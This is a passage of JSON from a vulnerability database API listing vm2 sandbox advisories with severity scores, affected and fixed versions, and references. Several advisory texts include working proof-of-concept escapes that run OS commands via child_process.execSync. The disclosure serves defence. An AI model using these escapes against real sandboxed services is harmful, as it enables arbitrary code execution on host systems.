","purl":"pkg:npm/vm2@3.6.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p1e-z4rv-1bfn"},{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4dwc-b66t-cuf8"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-7k1u-5wfd-sfgn"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-jv3n-721k-z3h7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-tux1-cjy7-53bf"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.6.11"}],"aliases":["CVE-2019-10761","GHSA-wf5x-cr3r-xr77"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pfwa-v62j-cyds"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61340?format=json","vulnerability_id":"VCID-pytn-u4me-9bee","summary":"vm2: Node.js: vm2: Arbitrary code execution via sandbox 
escape","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26956.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26956.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26956","reference_id":"","reference_type":"","scores":[{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31854","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31932","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31901","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31862","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.3183","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26956"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.5","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-05T13:09:59Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.5"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/
GHSA-ffh4-j6h5-pg66","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-05T13:09:59Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-ffh4-j6h5-pg66"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26956","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26956"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466548","reference_id":"2466548","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466548"},{"reference_url":"https://github.com/advisories/GHSA-ffh4-j6h5-pg66","reference_id":"GHSA-ffh4-j6h5-pg66","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ffh4-j6h5-pg66"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114464?format=json","purl":"pkg:npm/vm2@3.10.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-73yk-bmf3-d3e3"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d3fg-nauj-p3gk"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zx
gy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.10.5"}],"aliases":["CVE-2026-26956","GHSA-ffh4-j6h5-pg66"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pytn-u4me-9bee"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92253?format=json","vulnerability_id":"VCID-rd8s-311d-8qcq","summary":"vm2 Host Promise Resolution Preserves Object Identity Across Sandbox Boundary\n### Summary\n\nA sandbox boundary violation in **vm2** allows host object identity to cross into the sandbox through host Promise resolution.\n\nWhen a host-side Promise that resolves to a host object is exposed to the sandbox, the value delivered to the sandbox `.then()` callback preserves host identity. This allows the sandbox to interact with the host object directly, including:\n\n- Performing identity checks using host-side `WeakMap`\n- Mutating host object state from inside the sandbox\n\nThis behavior occurs because the Promise fulfillment wrapper uses `ensureThis()` instead of the stronger cross-realm conversion path (`from()` / proxy wrapping). 
If no prototype mapping is found, `ensureThis()` returns the original object.\n\nAs a result, objects resolved by host Promises can cross the sandbox boundary without proper isolation.\n\n---\n\n### Details\n\nIn `setup-sandbox.js`, vm2 wraps `Promise.prototype.then`:\n\n```js\nglobalPromise.prototype.then = function then(onFulfilled, onRejected) {\n  resetPromiseSpecies(this);\n\n  if (typeof onFulfilled === 'function') {\n    const origOnFulfilled = onFulfilled;\n    onFulfilled = function onFulfilled(value) {\n      value = ensureThis(value);\n      return apply(origOnFulfilled, this, [value]);\n    };\n  }\n\n  return apply(globalPromiseThen, this, [onFulfilled, onRejected]);\n};\n\n\nThe wrapper calls ensureThis(value) before invoking the sandbox callback.\n\nHowever, ensureThis is implemented in bridge.js as thisEnsureThis():\n\nfunction thisEnsureThis(other) {\n  const type = typeof other;\n\n  switch (type) {\n    case 'object':\n      if (other === null) return null;\n\n    case 'function':\n      let proto = thisReflectGetPrototypeOf(other);\n\n      if (!proto) {\n        return other;\n      }\n\n      while (proto) {\n        const mapping = thisReflectApply(thisMapGet, protoMappings, [proto]);\n\n        if (mapping) {\n          const mapped = thisReflectApply(thisWeakMapGet, mappingOtherToThis, [other]);\n          if (mapped) return mapped;\n          return mapping(defaultFactory, other);\n        }\n\n        proto = thisReflectGetPrototypeOf(proto);\n      }\n\n      return other;\n\nIf no prototype mapping is found, ensureThis() simply returns the original object:\n\nreturn other;\n\nThis means the sandbox receives the original host object instead of a proxied or sanitized representation.\n\nBecause of this behavior, values resolved by host Promises can cross the host–sandbox boundary with identity preserved.\n\nPoC\n\nThe following Proof of Concept demonstrates that an object resolved by a host Promise can be used as a valid key in a host-side 
WeakMap from inside the sandbox.\n\nWeakMap keys rely on reference identity, so a successful lookup proves that the sandbox received the host object identity.\n\nPoC Code\nimport {VM} from \"./index.js\";\n\nconst hostObj = {tag: \"HOST_OBJ\"};\nconst hostPromise = Promise.resolve(hostObj);\n\n// WeakMap created on the host\nconst wm = new WeakMap([[hostObj, \"HIT\"]]);\n\nconst vm = new VM({\n  sandbox: {hostPromise, wm},\n  timeout: 1000,\n  eval: false,\n  wasm: false,\n});\n\nconst code = `\n  hostPromise.then(v => ({\n    weakMapGet: wm.get(v),\n    typeofV: typeof v,\n    tag: v.tag\n  }))\n`;\n\nconst result = await vm.run(code);\n\nconsole.log(\"VM RESULT:\", result);\nconsole.log(\"HOST SAME KEY STILL:\", wm.get(hostObj));\nOutput\nVM RESULT: { weakMapGet: 'HIT', typeofV: 'object', tag: 'HOST_OBJ' }\nHOST SAME KEY STILL: HIT\n\nThis confirms that the object delivered to the sandbox callback retains host identity.\n\nAdditional Demonstration: Host Object Mutation\n\nThe sandbox can also mutate host object state through the resolved Promise value.\n\nimport {VM} from \"./index.js\";\n\nconst hostObj = {tag: \"HOST_OBJ\", nested: {x: 1}};\nconst hostPromise = Promise.resolve(hostObj);\n\nconst vm = new VM({\n  sandbox: {hostPromise},\n  timeout: 1000,\n  eval: false,\n  wasm: false,\n});\n\nconst code = `\n  hostPromise.then(v => {\n    v.nested.x = 999;\n    v.tag = \"MUTATED\";\n    return { seenTag: v.tag, seenX: v.nested.x };\n  })\n`;\n\nconst result = await vm.run(code);\n\nconsole.log(\"VM RESULT:\", result);\nconsole.log(\"HOST AFTER:\", hostObj);\n\n**Output:**\nVM RESULT: { seenTag: 'MUTATED', seenX: 999 }\nHOST AFTER: { tag: 'MUTATED', nested: { x: 999 } }\n\nThis demonstrates write-through mutation of a host object from sandbox code.\n\n**Impact**\nThis vulnerability allows host object references to cross the vm2 sandbox boundary via Promise resolution.\n\nConsequences include:\n\nHost object identity disclosure\n\nWrite-through mutation of host 
objects\n\nWeakMap / WeakSet identity oracle across the boundary\n\nPotential capability leaks if sensitive host objects are reachable via Promises\n\nApplications that expose host Promises to sandboxed code may unintentionally grant the sandbox direct access to host objects.\n\nThis weakens the intended isolation guarantees of vm2.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44000","reference_id":"","reference_type":"","scores":[{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.14856","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.14795","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.14773","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.149","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.14897","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44000"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-mpf8-4hx2-7cjg","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elemen
ts":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-13T18:20:50Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-mpf8-4hx2-7cjg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44000","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44000"},{"reference_url":"https://github.com/advisories/GHSA-mpf8-4hx2-7cjg","reference_id":"GHSA-mpf8-4hx2-7cjg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mpf8-4hx2-7cjg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44000","GHSA-mpf8-4hx2-7cjg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rd8s-311d-8qcq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94030?format=json","vulnerability_id":"VCID-t48f-zxgy-m7az","summary":"vm2 NodeVM `nesting: true` bypasses `require: false` allowing sandbox escape and arbitrary OS command execution\n### Summary\n\nWhen a `NodeVM` is created with `nesting: true`, sandbox code can unconditionally 
`require('vm2')` regardless of the outer VM's `require` configuration — including `require: false`. With access to `vm2`, the sandbox constructs a new inner `NodeVM` with its own unrestricted `require` settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a `NodeVM` with `nesting: true` is fully compromised.\n\n### Details\n\nThe vulnerability is in how the `nesting: true` option interacts with the legacy module resolver.\n\n**`lib/nodevm.js:96-99`** — `NESTING_OVERRIDE` is a special builtin map that injects the `vm2` package into the sandbox:\n\n```js\nconst NESTING_OVERRIDE = Object.freeze({\n  __proto__: null,\n  vm2: vm2NestingLoader\n});\n```\n\n**`lib/nodevm.js:268-269`** — When `nesting: true`, this override is passed into the resolver factory alongside the host's `require` options:\n\n```js\nconst customResolver = requireOpts instanceof Resolver;\nconst resolver = customResolver ? requireOpts : makeResolverFromLegacyOptions(\n  requireOpts,\n  nesting && NESTING_OVERRIDE,  // ← injected when nesting:true\n  this._compiler\n);\n```\n\n**`lib/resolver-compat.js:193-197`** — This is the vulnerable branch. When `require: false` is set, `requireOpts` is falsy, so `!options` is true. Without nesting the function returns `DENY_RESOLVER` (block everything). 
With nesting, it instead builds a resolver that includes `vm2` from `NESTING_OVERRIDE`:\n\n```js\nfunction makeResolverFromLegacyOptions(options, override, compiler) {\n  if (!options) {\n    if (!override) return DENY_RESOLVER;  // require:false, no nesting → deny all\n    // BUG: require:false + nesting:true reaches here\n    // override (NESTING_OVERRIDE) is applied, making vm2 available\n    const builtins = makeBuiltinsFromLegacyOptions(undefined, defaultRequire, undefined, override);\n    return new Resolver(DEFAULT_FS, [], builtins);  // vm2 is now requireable\n  }\n  // ...\n}\n```\n\n**`lib/builtin.js:102-106`** — `NESTING_OVERRIDE` is merged unconditionally into builtins, overriding any user-configured allowlist:\n\n```js\nif (overrides) {\n  const keys = Object.getOwnPropertyNames(overrides);\n  for (const key of keys) {\n    res.set(key, overrides[key]);  // vm2 always injected when nesting:true\n  }\n}\n```\n\nThe result: `require('vm2')` always succeeds inside a `NodeVM` with `nesting: true`, regardless of `require: false`, `require: { builtin: [] }`, or any other restriction. Once the sandbox has `vm2`, it creates a new inner `NodeVM` with whatever `require` config it chooses — unconstrained by the outer VM — and reaches `child_process`.\n\nThis was introduced in commit `2353ce60` (Feb 8, 2022) and survived a major refactor in commit `9e2b6051` (Apr 8, 2023). 
The JSDoc for `nesting` does warn that \"scripts can create a NodeVM which can require any host module,\" but does not document that `nesting: true` silently defeats `require: false`, which is the non-obvious part of this interaction.\n\n### PoC\n\n**Requirements:** vm2 installed, Node.js v22.22.1 (also reproduced on earlier versions).\n\n```js\nconst { NodeVM } = require('vm2');\n\n// Host intends: nesting enabled, but require completely disabled\nconst vm = new NodeVM({ nesting: true, require: false });\n\nconst result = vm.run(`\n  // Step 1: require('vm2') succeeds despite require:false on the outer VM\n  const { NodeVM: NVM } = require('vm2');\n\n  // Step 2: create an inner NodeVM with attacker-chosen require config\n  // This inner VM has no relation to the outer VM's restrictions\n  const inner = new NVM({ require: { builtin: ['child_process'] } });\n\n  // Step 3: execute arbitrary OS command in the inner VM\n  module.exports = inner.run(\n    'module.exports = require(\"child_process\").execSync(\"id\").toString()'\n  );\n`);\n\nconsole.log(result);\n// uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),...\n```\n\n**Observed output (confirmed on Node v22.22.1, vm2 commit `8dd0591`):**\n```\nuid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),104(kvm),118(lpadmin),989(docker),990(ollama),991(nordvpn)\n```\n\nThe variant with `require: false` also works — the outer VM's require setting has no effect:\n\n```js\nnew NodeVM({ nesting: true, require: false }).run(`\n  const { NodeVM: NVM } = require('vm2');\n  module.exports = new NVM({ require: { builtin: ['child_process'] } })\n    .run('module.exports = require(\"child_process\").execSync(\"id\").toString()');\n`);\n// uid=1000(akshat) ...\n```\n\nNarrow builtin allowlists are also bypassed. 
`require: { builtin: ['path'] }` still allows `require('vm2')` when nesting is enabled.\n\n### Impact\n\n**Who is affected:** Any application that runs untrusted or user-supplied code inside a `NodeVM` with `nesting: true`. This includes multi-tenant code execution platforms, notebook/REPL services, plugin systems, and CI sandboxing tools that use vm2.\n\n**What an attacker can do:** Execute arbitrary OS commands as the host process user. From there: read/write files, exfiltrate secrets from the environment, move laterally on the host network, or establish persistence.\n\n**Severity:** The mental model mismatch is the core danger. A developer who sets `require: false` to lock down modules, then adds `nesting: true` to allow child VM creation, will believe the sandbox is restricted. It is not — `require: false` is silently overridden and the sandbox has unrestricted OS access.\n\n**Note:** `nesting: true` must be set by the host. This is not a zero-cooperation escape from a default `NodeVM`. 
However, it is not pure misconfiguration either: the implementation defeats a strong and reasonable expectation (`require: false` should mean deny all), and the existing warning in the docs does not surface the `require: false` bypass specifically.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44007","reference_id":"","reference_type":"","scores":[{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.15048","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.1499","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.14965","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.15097","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.15088","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44007"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.1","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.1"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_syst
em":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-15T03:55:57Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44007","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44007"},{"reference_url":"http://www.openwall.com/lists/oss-security/2026/05/05/11","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2026/05/05/11"},{"reference_url":"https://github.com/advisories/GHSA-8hg8-63c5-gwmx","reference_id":"GHSA-8hg8-63c5-gwmx","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8hg8-63c5-gwmx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/117312?format=json","purl":"pkg:npm/vm2@3.11.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.1"}],"aliases":["CVE-2026-44007","GHSA-8hg8-63c5-gwmx"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t48f-zxgy-m7az"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94884?format=json","vulner
ability_id":"VCID-t5ax-32h1-13ha","summary":"vm2 has Sandbox Breakout Through Null Proto Exception\n### Summary\n\nVM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.\n\n### Details\n\nIn `handleException` due to ``// SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`)`` exceptions with a null proto will be assumed to come from the other side and be proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then caught, which allows getting the host `Function` object.\n\n### PoC\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nconsole.log(vm.run(`\nconst o = {__proto__: null};\ntry {\n\tthrow o;\n} catch (e) {\n\te.f = Buffer.prototype.inspect\n\to.f.constructor(\"return process\")().mainModule.require('child_process').execSync('touch pwned');\n}\n`));\n```\n\n### Impact\n\nAttackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 
sandbox.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44009","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.0572","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05699","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05664","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05707","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05706","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44009"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-9vg3-4rfj-wgcm","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-13T18:41:46Z/"}],"url
":"https://github.com/patriksimek/vm2/security/advisories/GHSA-9vg3-4rfj-wgcm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44009","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44009"},{"reference_url":"https://github.com/advisories/GHSA-9vg3-4rfj-wgcm","reference_id":"GHSA-9vg3-4rfj-wgcm","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9vg3-4rfj-wgcm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114480?format=json","purl":"pkg:npm/vm2@3.11.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ue7f-8en8-cufa"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.2"}],"aliases":["CVE-2026-44009","GHSA-9vg3-4rfj-wgcm"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t5ax-32h1-13ha"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41600?format=json","vulnerability_id":"VCID-tux1-cjy7-53bf","summary":"Improperly Controlled Modification of Dynamically-Determined Object Attributes\nThis affects the package vm2 via a Prototype Pollution attack vector, which can lead to execution of arbitrary code on the host 
